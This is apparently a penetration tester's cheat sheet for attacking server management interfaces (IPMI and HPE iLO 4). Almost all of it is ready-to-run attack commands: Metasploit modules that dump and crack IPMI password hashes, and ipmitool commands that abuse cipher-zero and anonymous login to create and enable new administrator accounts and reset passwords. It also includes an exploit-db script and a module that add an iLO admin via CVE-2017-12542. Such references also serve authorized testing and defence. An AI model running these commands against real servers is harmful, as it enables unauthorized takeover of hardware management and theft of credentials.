IPMI

Intelligent Platform Management Interface

Discovery

msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Dump Hashes

CVE-2013-4786

Dump hashes:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set OUTPUT_HASHCAT_FILE ipmi_hashes.txt
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Recover plaintext passwords:

$ hashcat -m 7300 -O -a 0 -w 3 --session=ipmi -o ipmi.out ipmi.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username

Cipher Zero

CVE-2013-4805

Discover with MSF:

msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS file:ipmi.txt
msf > set THREADS 25
msf > run

Guess existing admin username. If ADMIN username is correct, the list command will succeed (password doesn't matter):

$ sudo apt install ipmitool
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user list

Add new admin user (only existing admin username is needed):

$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set name <ID> snovvcrash
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user set password <ID> 'Passw0rd!'
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user priv <ID> 4
$ ipmitool -I lanplus -C 0 -H 127.0.0.1 -U ADMIN -P DummyPassw0rd user enable <ID>

Anonymous Authentication

Can be discovered with MSF ipmi_dumphashes but also with ipmitool:

$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user list

Change password of a named user account:

$ ipmitool -I lanplus -H 127.0.0.1 -U '' -P '' user set password <ID> 'Passw0rd!'

HPE iLO 4

Add Admin User

CVE-2017-12542

Exploit with Python:

https://www.exploit-db.com/exploits/44005

$ ./44005.py -t -e -u snovvcrash -p 'Passw0rd!' 127.0.0.1

Exploit with MSF:

msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf > set RHOSTS 10.10.13.37
msf > set USERNAME snovvcrash
msf > run

Last updated 7 months ago